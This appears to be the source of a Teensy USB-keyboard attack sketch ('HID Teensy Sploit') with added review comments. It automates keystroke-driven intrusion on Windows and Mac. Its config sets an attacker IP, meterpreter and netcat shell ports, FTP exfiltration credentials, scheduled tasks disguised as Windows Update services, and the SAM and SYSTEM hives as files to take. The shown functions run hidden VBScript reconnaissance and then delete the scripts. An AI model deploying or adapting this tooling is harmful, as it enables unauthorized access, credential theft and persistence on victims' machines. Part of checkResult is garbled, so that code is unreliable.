/** ################################################ ########## HID TEENSY SPLOIT ########## ################################################ Author: Mike Czumak (T_v3rn1x) @SecuritySift www.securitysift.com ################################################ The following teensy sketch is designed to automate several tasks including: - admin acct creation (windows only, requires admin privs) - limited AV bypass via folder-level scanning exceptions (windows only, requires admin privs) - remote file download and upload (windows and mac) - privilege escalation (mac only, limited to pre-Mavericks) - remote shell access (windows and mac) - remote RDP access (windows only) In its current state it's more a demo of what can be done with Teensy, with much room for expansion and improvement (both functionality and coding). It's been tested on Mac (Mavericks and earlier), Windows XP and Windows 7, and on Teensy 3.1. Some of the functions utilize slightly modified versions of scripts found on the webz as well as Offsec's Peensy code: https://github.com/offensive-security/hid-backdoor-peensy You are free to copy, modify, and reuse any or all of this code as long as you maintain original author attribution and do not incorporate it into any commercial product or service. Be sure to only execute this sketch on targets for which you have express permission! **/ /** ################################################ ############### CONFIG ############## ################################################ set common global variables used in functions ################################################ **/ /** universal variables -- OS-independent variables used across multiple functions. Global vars are used for configuration because multiple functions need to read and, in some cases, set these variables and flags. 
**/

// remote ips/ports/urls for shells, downloads, and uploads
// NOTE(review): every value in this section is a clear-text literal compiled into the firmware, so the
// remote host, the FTP/plink credentials and the local account password are recoverable from the device
// or its image. The same literals are the artifacts the Windows functions below leave on a host
// (remote_ip in netstat output, the task names and the drop folder declared further down).
const char *remote_ip = "192.168.1.1";             // ip for establishing remote shell connection
const char *remote_met32_port = "4444";            // port for establishing remote 32-bit meterpreter connection
const char *remote_met64_port = "4445";            // port for establishing remote 64-bit meterpreter connection
const char *remote_tcp32_port = "4446";            // port for establishing remote 32-bit reverse tcp connection
const char *remote_nc_port = "5555";               // secondary port for fallback netcat shell only
const char *remote_url = "http://192.168.1.1/";    // url for downloading remote files to machine (plain http; nothing downstream verifies what is saved)
const char *remote_ftp = "192.168.1.1";            // ftp server for get/put of files to/from target machine

// users/passwords/ssh keys -- ssh key used for plink registry modification
// NOTE(review): remote_user/remote_pass are echoed into an ftp script file on disk and onto the plink
// command line by the transfer functions below; remote_pass equal to remote_user is a placeholder, not a secret.
const char *remote_user = "remoteuser";            // username for any credentialed communications such as ftp or plink tunnel
const char *remote_pass = "remoteuser";            // password for any credentialed communications such as ftp or plink tunnel
const char *local_user = "r00ted";                 // username to use when creating local admin account
const char *local_pass = "r00ted";                 // password to use when creating local admin account
const char *ssh_key = "0x10001,[PUT KEY HERE]";    // value written by win_plinkRDP under PuTTY's SshHostKeys; "[PUT KEY HERE]" is a placeholder the operator must replace

// the lock leds (CAPS/NUM/SCROLL) are used as binary indicators to communicate the results of a script to the Teensy
// this sketch only uses a single key (NUMLOCK) though it could be modified to use a different key or multiple keys to
// communicate more than one data point from each script; these are not used in the Mac script (will be ignored)
const char *lock_type = "NUMLOCK";                 // set to desired lock led to use for setting state (NUMLOCK or CAPSLOCK or SCROLLLOCK)
                                                   // NOTE(review): isLockOn()/toggleLock() match this pointer with ==/= rather than strcmp; see the notes there before changing it
unsigned int lock_check_attempts = 2;              // number of attempts to check lock key led status to validate script results
unsigned int lock_check_wait = 1000;               // amount of time in milliseconds to wait between attempts to check lock key led status (blink_fast reuses it as its on/off period)
boolean dip_on = true;                             // set to true if a dip switch is attached
boolean persistent_shell = true;                   // set to true if you want to attempt a persistent shell

// DIP switch pin initialization; change these pin values depending on your Teensy model (2.0 vs. 3.0) and dip switch pin count
// currently set for a 4 switch DIP on Teensy 3.1
unsigned int dip1 = 12;
unsigned int dip2 = 11;
unsigned int dip3 = 10;
unsigned int dip4 = 9;

// Teensy 3.0 has LED on 13
const int led_pin = 13;

// used to set target OS if no DIP switch is attached; ignore if you are using a DIP switch
// if is_Win is set to true a subsequent function will determine the flavor (XP or 7+)
// NOTE(review): a tag starting with '_' followed by an uppercase letter is reserved for the implementation.
struct _OS {
    unsigned int is_Mac : 1; // please note this is the bit field size, not a boolean value. Don't change!
    unsigned int is_Win: 1;
} OS = {0,0};                // if dip_on is set to false, you'll need to set the target OS manually here (only set one!)

// various flags used to maintain state between functions based on boolean checks communicated via LED state
// DON'T CHANGE -- these are bit field sizes, not boolean values!
// In this listing is_admin is written by win_checkIfAdmin, is_win7 by win_checkIfWinXP and is_64bit by
// win_checkArch; is_user and persist are not written by any function visible here.
// NOTE(review): the tag '_flags' is a reserved identifier, and using it as a type name without 'struct'
// below only compiles as C++ (which the Arduino toolchain uses).
struct _flags {
    unsigned int is_user : 1;
    unsigned int is_admin : 1;
    unsigned int is_win7 : 1;
    unsigned int is_64bit : 1;
    unsigned int persist : 1;
};
_flags flag = {0,0,0,0,0};   // initialize all check flags to false; subsequent OS-dependent functions will set as needed
                             // DON'T CHANGE -- these will be set automatically

/** Windows variables -- Variables only used in Windows-specific functions **/

// names to use when creating tasks on target
// NOTE(review): these fixed task names are host artifacts (schtasks /query lists them by name; win_checkForTask relies on that).
const char *win_netcat_task_name = "WindowsUpdateNcTaskSystemService";       // name to use for netcat scheduled task
const char *win_python_task_name = "WindowsUpdatePyTaskSystemService";       // name to use for python scheduled task
const char *win_vbscript_task_name = "WindowsUpdateVBTaskSystemService";     // name to use for vbscript scheduled task
const char *win_powershell_task_name = "WindowsUpdatePSTaskSystemService";   // name to use for powershell scheduled task

const char *win_local_target_folder ="C:\\temp\\a1b2c3d4e5f6g7h8i9j0\\";   // location on victim machine where exe's and other files
                                                                           // will be downloaded and a target for AV circumvention
                                                                           // will attempt to create new folder using this value (fails quietly if exists)
                                                                           // NOTE(review): every .vbs/.bat/.txt the Windows functions write lands here before cscript/ftp runs it;
                                                                           // win_deleteFile removes the files afterwards, but no function in this listing removes the folder itself.
                                                                           // The trailing backslash is relied on by every caller that appends a file name.

// file names to use when creating persistent shells on target machine
const char *win_python_file_name = "shell.py";     // name to use when creating persistent python shell on target
const char *win_vbscript_file_name = "shell.exe";  // name to use when creating persistent vbscript shell on target
                                                   // NOTE(review): same name as meterpreter_remote_file below; both resolve to the same path in win_local_target_folder -- confirm intended
const char *win_psscript_file_name = "shell.ps1";  // name to use when creating persistent powershell shell on target

// remote files to fetch from attacking machine -- modify if you have these saved under different names
const char *netcat_remote_file = "nc.exe";
const char *meterpreter_remote_file = "shell.exe";
const char *plink_remote_file = "plink.exe";

// array of remote files to fetch from target machine
// NOTE(review): both entries fit the 50-byte rows; the array is not const although nothing visible writes to it.
char win_target_files[][50] = {
    "C:\\windows\\system32\\config\\sam",
    "C:\\windows\\system32\\config\\system"
};
/** Mac variables -- Variables only used in Mac-specific functions **/
// placeholder for mac-specific variables

/** ################################################
    ############# COMMON FUNCTIONS ###########
    ################################################ **/

/** fetch led keys
    Returns the host-reported keyboard LED bitmap (keyboard_leds is supplied by the Teensy USB core, not by this file). **/
int ledKeys(void) {return int(keyboard_leds);}

/** check state of designated lock key
    Reads bit 0 of ledKeys() for NUMLOCK, bit 1 for CAPSLOCK and bit 2 for SCROLLLOCK.
    NOTE(review): lock_type is matched by pointer equality against a literal, which only works while the
    compiler merges identical literals; if none of the three branches matches, control falls off the end of
    a non-void function (undefined behaviour). **/
boolean isLockOn(void) {
    if (lock_type == "NUMLOCK"){return ((ledKeys() & 1) == 1) ? true : false;}
    if (lock_type == "CAPSLOCK"){return ((ledKeys() & 2) == 2) ? true : false;}
    if (lock_type == "SCROLLLOCK"){return ((ledKeys() & 4) == 4) ? true : false;}
}

/** toggle the designated lock key
    NOTE(review): each condition uses '=' (assignment), not '=='. The first branch is therefore always taken,
    KEY_NUM_LOCK is always the key sent, and lock_type is overwritten with "NUMLOCK" as a side effect. **/
void toggleLock(void) {
    if (lock_type = "NUMLOCK"){
        Keyboard.set_key1(KEY_NUM_LOCK);
    } else if (lock_type = "CAPSLOCK") {
        Keyboard.set_key1(KEY_CAPS_LOCK);
    } else if (lock_type = "SCROLLLOCK") {
        Keyboard.set_key1(KEY_SCROLL_LOCK);
    }
    Keyboard.send_now();
    clearKeys();   // defined elsewhere in the sketch (not in this listing)
}

/** reset LED state: turn the designated lock LED off if it is currently on **/
void lockLEDReset(void) {
    if (isLockOn()) {
        toggleLock();
    }
}

/** from offensive security peensy code set
    Blinks led_pin five times. Both the on and the off period reuse lock_check_wait, so one call takes
    10 * lock_check_wait ms (10 s with the default config). **/
void blink_fast(void) {
    unsigned int blinkcounter=0;
    unsigned int blinkrate=5;
    for(blinkcounter=0; blinkcounter!=blinkrate; blinkcounter++) {
        digitalWrite(led_pin, HIGH);
        delay(lock_check_wait);
        digitalWrite(led_pin, LOW);
        delay(lock_check_wait);
    }
}

/** Wait for OS to be ready before script execution
    Slightly mod'd version from Offsec Peensy code
    Toggles the lock key until the host reflects the change in its LED report (i.e. the HID driver is up and
    processing keystrokes), then toggles once more to restore the original LED state. **/
void wait_for_drivers(void) {
    boolean numLockTrap = isLockOn();
    while(numLockTrap == isLockOn()) {
        blink_fast();
        toggleLock();
        delay(lock_check_wait);
    }
    toggleLock();
    delay(lock_check_wait);
}

/** check result of script using designated lock key LED as defined in config section
    Polls the LED every lock_check_wait ms; when it is found on, the LED is toggled back off and true is returned.
    NOTE(review): the listing loses text between "(i" and "> 8 & 0xff)" below (an extraction artifact at a '<'),
    so the loop bound, the false return of checkResult and the head of the port-to-hex helper whose tail
    follows cannot be reviewed here. **/
boolean checkResult (void) {
    unsigned int i = 0;
    do {
        delay(lock_check_wait);
        if (isLockOn()) {
            toggleLock();
            delay(700);
            return true;
        }
        i++;
    } while (!isLockOn() && (i> 8 & 0xff), (port & 0xff)); } else if (hextype == "python") { sprintf(tempporthex, "\\x%.2x\\x%.2x",(port >> 8 & 0xff), 
(port & 0xff));
    } else if (hextype == "powershell"){
        sprintf(tempporthex, "$rport=0x%.2x,0x%.2x;",(port >> 8 & 0xff), (port & 0xff));
    }
    // copy temp hex value to return variable
    // NOTE(review): the result is heap-allocated and owned by the caller (free()); malloc() is unchecked, and
    // when hextype matches no branch tempporthex is used as-is (its initialisation lies outside this listing).
    porthex=(char*)malloc(strlen(tempporthex)+1);
    strcpy(porthex,tempporthex);
    return porthex;
}

/** convert each octet of the char string remote_ip into hex
    hextype selects the layout: "vbscript" -> "xx xx xx xx", "python" -> "\xXX\xXX\xXX\xXX",
    "powershell" -> "$rhost=0xXX,0xXX,0xXX,0xXX;". Returns a malloc'd string the caller must free.
    NOTE(review): hextype is compared by pointer (==) against literals, so only a literal from this translation
    unit can match, and on no match tempiphex is left uninitialised before strlen() reads it. remote_ip is assumed
    to be a well-formed dotted quad: strtok() returning NULL would pass NULL to atoi(), and octet values that do not
    fit in two hex digits lengthen the output beyond what the 32-byte buffer was sized for. malloc() is unchecked. **/
char* makeIPHex(char *hextype) {
    unsigned int oct, oct1, oct2, oct3, oct4, i;
    char tempiphex[32];   // hold local iphex value
    char *iphex = NULL;   // return iphex
    char *tempip = NULL;

    // make a copy of remote_ip to use in modifying function strtok
    tempip=(char*)malloc(strlen(remote_ip)+1);
    strcpy(tempip,remote_ip);

    // grab each octet of the copy of remote_ip to convert to hex
    oct1 = atoi(strtok(tempip, "."));
    i = 2;
    while (i < 5){
        oct = atoi(strtok (NULL, "."));
        switch (i){
            case 2: oct2 = oct; break;
            case 3: oct3 = oct; break;
            case 4: oct4 = oct; break;
            default: break;
        }
        i++;
    }

    // format the return value according to hextype argument
    if (hextype=="vbscript"){
        sprintf(tempiphex, "%.2x %.2x %.2x %.2x", oct1,oct2,oct3,oct4);
    } else if (hextype == "python") {
        sprintf(tempiphex, "\\x%.2x\\x%.2x\\x%.2x\\x%.2x", oct1,oct2,oct3,oct4);
    } else if (hextype == "powershell"){
        sprintf(tempiphex, "$rhost=0x%.2x,0x%.2x,0x%.2x,0x%.2x;", oct1,oct2,oct3,oct4);
    }
    free(tempip);   // free memory

    // copy temp hex value to return variable
    iphex=(char*)malloc(strlen(tempiphex)+1);
    strcpy(iphex,tempiphex);
    return iphex;
}

/** ################################################
    ############ WINDOWS FUNCTIONS ###########
    ################################################ **/

/** ============= Prompts/Windows/Keys ============= **/

/** minimize all open windows (Win+M) **/
void win_minWindows(void) {
    delay(300);
    Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
    Keyboard.set_key1(KEY_M);
    Keyboard.send_now();
    clearKeys();
}

/** restore all previously-minimized windows (Win+Shift+M; the modifiers are raised in two reports) **/
void win_restoreWindows(void) {
    delay(300);
    Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
    Keyboard.send_now();
    Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI | MODIFIERKEY_SHIFT);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_M);
    Keyboard.send_now();
    clearKeys();
}

/** close the current window (Alt+F4) **/
void win_closeWindow(void) {
    delay(300);
    Keyboard.set_modifier(MODIFIERKEY_ALT);
    Keyboard.set_key1(KEY_F4);
    Keyboard.send_now();
    clearKeys();
}

/** equivalent of Winkey + R **/
void win_run(void) {
    Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
    Keyboard.set_key1(KEY_R);
    Keyboard.send_now();
    clearKeys();
}

/** open cmd.exe as admin
    NOTE(review): despite the doc line this is a plain Win+R launch of cmd.exe with no elevation step, so the
    prompt runs with the logged-on user's token; the elevated variant is win_openCmdAlt. Every other Windows
    function in this listing starts with this call, so each of them spawns a fresh cmd.exe process. **/
void win_openCmd(void) {
    delay(300);
    win_run();
    Keyboard.print("cmd.exe");
    Keyboard.set_key1(KEY_ENTER);
    Keyboard.send_now();
    Keyboard.send_now();
    clearKeys();
}

/** open cmd.exe as admin - alt version for VM testing
    Launches cmd.exe from the Start menu with Ctrl+Shift+Enter and then answers the resulting prompt with
    Left/Enter after fixed delays; timing-dependent, as the author's "VM testing" wording suggests. **/
void win_openCmdAlt(void) {
    delay(300);
    Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
    Keyboard.send_now();
    clearKeys();
    Keyboard.print("cmd.exe");
    Keyboard.set_modifier(MODIFIERKEY_CTRL);
    Keyboard.send_now();
    Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_ENTER);
    Keyboard.send_now();
    clearKeys();
    delay(500);
    sendKey(KEY_LEFT);   // sendKey is defined elsewhere in the sketch
    delay(200);
    sendKey(KEY_ENTER);  // confirm security prompt
}

/** open powershell (Start menu search via the Win key, then "powershell" + Enter) **/
void win_openPowershell(void) {
    delay(300);
    Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
    Keyboard.send_now();
    clearKeys();
    Keyboard.println("powershell");
}

/** send ctrl-alt-del sequence **/
void win_sendCtrlAltDel(void) {
    Keyboard.set_modifier(MODIFIERKEY_CTRL);
    Keyboard.send_now();
    Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_DELETE);
    Keyboard.send_now();
    clearKeys();
}

/** open python prompt
    @param path  directory prefix typed before "python" in the Run box (passed through F() although it is not a literal). **/
void win_openPythonPrompt(char *path) {
    Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
    Keyboard.set_key1(KEY_R);
    Keyboard.send_now();
    clearKeys();
    delay(300);
    Keyboard.print(F(path));
    Keyboard.println("python");
}

/** Lock the workstation (rundll32 LockWorkStation typed into a fresh cmd window) **/
void win_lockWS(void) {
    win_openCmd();
    delay(200);
    Keyboard.println("rundll32.exe 
user32.dll LockWorkStation"); } /** Restart the workstation **/ void win_restartWS(void) { win_run(); delay(200); Keyboard.println("shutdown -r -t 0"); Keyboard.set_key1(KEY_ENTER); // to address the prompt Keyboard.send_now(); clearKeys(); } /** Toggle the desired "lock" key as defined in the config section **/ void win_toggleLockKey(char key) { win_openCmd(); // open cmd.exe Keyboard.print(F("echo Set WshShell = WScript.CreateObject(\"WScript.Shell\"): WshShell.SendKeys \"{")); Keyboard.print(F(key)); Keyboard.println(F("}\"' > presslock.vbs")); delay(400); Keyboard.println(F("cscript presslock.vbs")); delay(2000); win_deleteFile(win_local_target_folder, "presslock.vbs"); } /** ============= File management & disk cleanup ============= **/ /** create a directory; can be useful to have a known location for file download/creation and AV exceptions use win_local_target_folder variable declared in config section if you want to create a location for file and script storage that doesn't already exist on the machine (e.g. C:\\temp\). Even if it does exist, it will fail gracefully **/ void win_createFolder(const char *path) { win_openCmd(); delay(300); Keyboard.print(F("mkdir ")); delay(300); Keyboard.println(F(path)); delay(300); Keyboard.println("exit"); } /** delete a file -- use for script cleanup **/ void win_deleteFile(const char *path, const char *filename) { win_openCmd(); delay(500); Keyboard.print(F("del ")); delay(300); Keyboard.print(F(path)); delay(300); Keyboard.println(filename); delay(500); Keyboard.println("exit"); } /** Not currently used in this sketch Run disk cleanup utlitity or empty the recycle bin. Not forensic cleanup but better than nothing With the winDeleteFile function you should not have to use this but if you find yourself in need of a cleanup script you may choose to use / modify as needed. 
    Drives cleanmgr.exe or the Recycle Bin folder purely through keystrokes with fixed delays and key counts,
    so it is sensitive to dialog layout and account type (the author flags it as error prone). **/
void win_diskCleanup(void) {
    delay(200);
    if (flag.is_admin) {
        // use cleanmgr to empty recycle bin, temp files, etc; this can be error prone as it's currently GUI based!
        win_run();
        Keyboard.println("c:\\windows\\system32\\cleanmgr.exe /sageset:55555");   // arbitrarily chosen profile number to avoid existing sageset profile
        delay(2000);
        sendKey(KEY_DOWN); sendKey(KEY_DOWN); sendKey(KEY_DOWN); sendKey(KEY_DOWN); sendKey(KEY_DOWN);
        sendKey(KEY_SPACE);   // Options can differ based on account
        sendKey(KEY_DOWN);
        sendKey(KEY_SPACE);   // These should at least select "Recycle Bin"
        sendKey(KEY_DOWN);
        sendKey(KEY_SPACE);   // and temporary internet files
        sendKey(KEY_DOWN); sendKey(KEY_DOWN); sendKey(KEY_DOWN); sendKey(KEY_DOWN);
        sendKey(KEY_DOWN); sendKey(KEY_DOWN); sendKey(KEY_DOWN); sendKey(KEY_DOWN);   // make sure we key down to last options
        sendKey(KEY_TAB);
        sendKey(KEY_ENTER);   // "Ok"
        delay(200);
        Keyboard.println("");   // This was necessary for next cmd to execute during testing
        delay(500);
        win_run();
        Keyboard.println("c:\\windows\\system32\\cleanmgr.exe /sagerun:55555");   // the sageset profile above persists in the registry under that number
    } else {
        // can't use cleanmgr, empty recycle bin only from gui
        win_openCmd();
        Keyboard.println("start shell:RecycleBinFolder");
        delay(300);
        sendKey(KEY_TAB); sendKey(KEY_TAB); sendKey(KEY_TAB);
        sendKey(KEY_ENTER);   // "Empty Recycle Bin"
        delay(300);
        sendKey(KEY_ENTER);   // Confirm "Yes"
        delay(300);
        win_closeWindow();
        delay(300);
    }
    //Keyboard.println("exit");
    win_closeWindow();
}

/** ============= Check Scripts ============= **/

/** The following "check" scripts return boolean values based on tested conditions (is user an admin?, does file
    exist?, etc). The results are communicated to the Teensy via LED states (CAPSLOCK, NUMLOCK). In addition to
    returning a boolean value some checks may also set a flag (see config section).
    NOTE(review): each check follows the same pattern -- echo a one-line VBScript into win_local_target_folder,
    run it with cscript, delete it, then poll the LED with checkResult(). The script file name, the cscript
    process and the SendKeys call are the observable host-side footprint of every check. 
    Maintaining this state via flags is preferred if additional functions need to check the same state later in the
    program logic in order to avoid the overhead of re-running the script **/

/** check if the current user is an administrator
    Enumerates the local Administrators group via WinNT:// and sends the lock key if the current user's name is a
    member. Sets flag.is_admin on success. Does not detect membership through nested groups (only direct Members
    are compared) -- presumably acceptable for the author's use; verify if relied on. **/
boolean win_checkIfAdmin() {
    lockLEDReset();   // reset state of lock key to off
    win_openCmd();
    delay(500);
    const char *scriptname = "admincheck.vbs";
    Keyboard.print(F("echo Set objNetwork = CreateObject(\"Wscript.Network\") : "));
    Keyboard.print(F("strComputer = objNetwork.ComputerName : "));
    Keyboard.print(F("strUser = objNetwork.UserName : "));
    Keyboard.print(F("strObject = \"WinNT://\" ^& strComputer ^& \"/Administrators\" : "));
    Keyboard.print(F("Set objGroup = GetObject(strObject) : For Each objUser in objGroup.Members : "));
    Keyboard.print(F("If LCase(objUser.Name) = LCase(strUser) Then : Set WshShell = WScript.CreateObject(\"WScript.Shell\"):WshShell.SendKeys \"{"));
    Keyboard.print(F(lock_type));
    Keyboard.print(F("}\" : End If : Next >"));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(scriptname);
    delay(500);
    Keyboard.print(F("cscript "));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(scriptname);
    delay(500);
    Keyboard.println("exit");
    win_deleteFile(win_local_target_folder, scriptname);   // delete script file
    delay(2000);
    if (checkResult()) {
        flag.is_admin = 1;   // if lock led is on, the current user is an admin
        return true;
    }
    return false;
}

/** checks if a given program is installed on the machine
    @param program_name  substring matched (InStr) against DisplayName under HKLM\...\Uninstall; passed through F() although not a literal.
    Only the 64-bit/native Uninstall hive is enumerated (no Wow6432Node), so 32-bit packages on a 64-bit host may be missed -- confirm. **/
boolean win_checkIfInstalled(char *program_name) {
    lockLEDReset();   // reset state of lock key to off
    win_openCmd();
    delay(500);
    const char *scriptname = "installcheck.vbs";
    Keyboard.print(F("echo Const HKLM = ^&H80000002 : "));
    delay(200);
    Keyboard.print(F("strKeyPath = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\" : "));
    delay(200);
    Keyboard.print(F("strValueName = \"DisplayName\" : "));
    delay(200);
    Keyboard.print(F("Set objReg = GetObject(\"winmgmts://./root/default:StdRegProv\") 
: "));
    delay(200);
    Keyboard.print(F("objReg.EnumKey HKLM, strKeyPath, arrSubkeys : "));
    delay(200);
    Keyboard.print(F("For Each subkey In arrSubkeys : "));
    delay(200);
    Keyboard.print(F("intRet = objReg.GetStringValue(HKLM, strKeyPath ^& subkey, strValueName, strValue) : "));
    delay(200);
    Keyboard.print(F("If inStr(strValue, \""));
    delay(200);
    Keyboard.print(F(program_name));
    delay(200);
    Keyboard.print(F("\") Then : Set WshShell = WScript.CreateObject(\"WScript.Shell\"):WshShell.SendKeys \"{"));
    delay(200);
    Keyboard.print(F(lock_type));
    delay(200);
    Keyboard.print(F("}\" : End If : Next >"));
    delay(200);
    Keyboard.print(F(win_local_target_folder));
    delay(200);
    Keyboard.println(scriptname);
    delay(500);
    Keyboard.print(F("cscript "));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(scriptname);
    delay(500);
    Keyboard.println("exit");
    win_deleteFile(win_local_target_folder, scriptname);   // delete script file
    if (checkResult()) {
        return true;
    }
    return false;
}

/** check if a user exists on the system; useful if you created a new user (via win_addUser()) and want to verify
    the operation was successful
    Enumerates local accounts (WinNT://<computer>, Filter "user") and compares each name against local_user with
    a case-sensitive '=' (unlike win_checkIfAdmin, which lowercases both sides). Does not set flag.is_user. **/
boolean win_checkIfUser(void) {
    lockLEDReset();   // reset state of lock key to off
    win_openCmd();
    delay(500);
    const char *scriptname = "usercheck.vbs";
    Keyboard.print(F("echo Set objNetwork = CreateObject(\"Wscript.Network\") : "));
    Keyboard.print(F("strComputer = objNetwork.ComputerName : "));
    Keyboard.print(F("strObject = \"WinNT://\" ^& strComputer ^& \"\" : "));
    Keyboard.print(F("Set objGroup = GetObject(strObject) : "));
    Keyboard.print(F("objGroup.Filter = Array(\"user\") : "));
    Keyboard.print(F("For Each objUser in objGroup : "));
    Keyboard.print(F("If objUser.Name = \""));
    Keyboard.print(F(local_user));
    Keyboard.print(F("\" Then : Set WshShell = WScript.CreateObject(\"WScript.Shell\"):WshShell.SendKeys \"{"));
    Keyboard.print(F(lock_type));
    Keyboard.print(F("}\" : End If : Next >"));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(scriptname);
    delay(500);
    Keyboard.print(F("cscript "));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(scriptname);
    delay(500);
    Keyboard.println("exit");
    win_deleteFile(win_local_target_folder, scriptname);   // delete script file
    if (checkResult()) {
        return true;
    }
    return false;
}

/** check if a file exists on the filesystem
    useful if you download a file via one of the "fetch" functions and want to verify success
    @param filepath  directory prefix (callers pass win_local_target_folder); concatenated with filename without a separator
    @param filename  file name to test with FileSystemObject.FileExists
    Unlike the other checks this one leaves cmd with "cd \ && exit" and adds two 1 s pauses around the cleanup. **/
boolean win_checkIfFile(const char *filepath, const char *filename) {
    lockLEDReset();   // reset state of lock key to off
    win_openCmd();
    delay(500);
    const char *scriptname = "filecheck.vbs";
    Keyboard.print(F("echo Set objFSO = CreateObject(\"Scripting.FileSystemObject\") : If objFSO.FileExists(\""));
    delay(200);
    Keyboard.print(F(filepath));
    delay(200);
    Keyboard.print(F(filename));
    delay(200);
    Keyboard.print(F("\") Then : Set WshShell = WScript.CreateObject(\"WScript.Shell\"):WshShell.SendKeys \"{"));
    delay(200);
    Keyboard.print(F(lock_type));
    delay(200);
    Keyboard.print(F("}\" : "));
    Keyboard.print(F("End If >"));
    delay(200);
    Keyboard.print(F(win_local_target_folder));
    delay(200);
    Keyboard.println(scriptname);
    delay(500);
    Keyboard.print(F("cscript "));
    Keyboard.print(F(win_local_target_folder));
    delay(200);
    Keyboard.println(scriptname);
    delay(500);
    Keyboard.println("cd \\ && exit");
    delay(1000);
    win_deleteFile(win_local_target_folder, scriptname);   // delete script file
    delay(1000);
    if (checkResult()) {
        return true;
    }
    return false;
}

/** Verify that you're connected to the remote ip (as defined in the config section)
    useful if you want to verify success of remote shell
    Runs "netstat -an" through WshShell.Exec and looks for a line containing both remote_ip and ESTABLISHED;
    a substring match, so remote_ip "192.168.1.1" would also match 192.168.1.10-19 -- note if that matters.
    The same netstat view is what a host-side responder would use to spot the connection. **/
boolean win_checkIfConnected() {
    lockLEDReset();   // reset state of lock key to off
    win_openCmd();
    delay(500);
    const char *scriptname = "netstatcheck.vbs";
    Keyboard.print(F("echo Set WshShell = CreateObject(\"Wscript.Shell\") : "));
    Keyboard.print(F("set WshExec = WshShell.Exec(\"netstat -an\") : "));
    Keyboard.print(F("Do While Not WshExec.StdOut.AtEndOfStream : "));
    Keyboard.print(F("outline = WshExec.StdOut.ReadLine() : "));
    Keyboard.print(F("If ((InStr(outline, \""));
    Keyboard.print(F(remote_ip));
    Keyboard.print(F("\")) And (Instr(outline, \"ESTABLISHED\"))) Then : "));
    Keyboard.print(F("Set WshShell = WScript.CreateObject(\"WScript.Shell\"):WshShell.SendKeys \"{"));
    Keyboard .print(F(lock_type));
    Keyboard.print(F("}\" : wscript.quit : "));
    Keyboard.print(F("End If : Loop >"));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(scriptname);
    delay(500);
    Keyboard.print(F("cscript "));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(scriptname);
    delay(500);
    Keyboard.println("exit");
    win_deleteFile(win_local_target_folder, scriptname);   // delete script file
    if (checkResult()) {
        return true;
    }
    return false;
}

/** Checks version of windows. Currently this is a boolean/binary check for Win XP. Used to determine if it should
    proceed with the vbscript-based XP functions or the PowerShell-based functions.
    Queries Win32_OperatingSystem.Caption for the substring "Windows XP".
    NOTE(review): the return value is inverted relative to the name -- the LED is set on XP, but the function sets
    flag.is_win7 and returns true only when the LED is NOT seen; on XP it returns false. Callers in this listing
    read flag.is_win7, so the flag is the reliable signal, not the boolean; the inline comment below says the opposite. **/
boolean win_checkIfWinXP(void) {
    lockLEDReset();   // reset state of lock key to off
    win_openCmd();
    delay(2000);
    const char *scriptname = "oscheck.vbs";
    Keyboard.print(F("echo Set SystemSet = GetObject(\"winmgmts:\").InstancesOf(\"Win32_OperatingSystem\"): "));
    Keyboard.print(F("for each System in SystemSet : OS = System.Caption : "));
    Keyboard.print(F("if inStr(OS, \"Windows XP\") Then : "));
    Keyboard.print(F("Set WshShell = WScript.CreateObject(\"WScript.Shell\"):WshShell.SendKeys \"{"));
    Keyboard.print(F(lock_type));
    Keyboard.print(F("}\" : "));
    Keyboard.print(F("End If : Next >"));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(scriptname);
    delay(500);
    Keyboard.print(F("cscript "));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(scriptname);
    delay(500);
    Keyboard.println("exit");
    win_deleteFile(win_local_target_folder, scriptname);   // delete script file
    if (!checkResult()) {
        flag.is_win7 = 1;
        return true;   // if designated lock led is on, then it's a Windows XP machine
    }
    return 
false;
}

/** Check for Windows architecture using vbscript. slightly mod'd version of Offsec Peensy function
    Builds arch.vbs in three echo lines and sets flag.is_64bit when Win32_Processor.AddressWidth is 64.
    NOTE(review): (1) the script hard-codes "{NUMLOCK}" instead of lock_type, so it breaks silently if the config
    key is changed; (2) lockLEDReset() is not called first, unlike the other checks; (3) the function is declared
    boolean but has no return statement at all (undefined behaviour if the caller uses the value); (4) the echoed
    first line contains a stray "'" after the closing brace. **/
boolean win_checkArch(void) {
    const char *scriptname = "arch.vbs";
    win_openCmd();   // open cmd.exe
    delay(300);
    Keyboard.print(F("echo If Is64Bit Then: Set WshShell = WScript.CreateObject(\"WScript.Shell\"): WshShell.SendKeys \"{NUMLOCK}\"':End If > "));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(scriptname);
    Keyboard.print(F("echo Function Is64Bit(): Is64Bit = False: Dim colOS : Set colOS = GetObject(\"WinMGMTS://\").ExecQuery(\"SELECT AddressWidth FROM Win32_Processor\",,48): Dim objOS: For Each objOS In colOS: If objOS.AddressWidth = 64 Then Is64Bit = True >> "));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(scriptname);
    Keyboard.print(F("echo Next: End Function >> "));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(scriptname);
    delay(700);
    Keyboard.print(F("cscript "));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(scriptname);
    delay(500);
    Keyboard.println("exit");
    win_deleteFile(win_local_target_folder, scriptname);   // delete script file
    delay(500);
    if (checkResult()) {
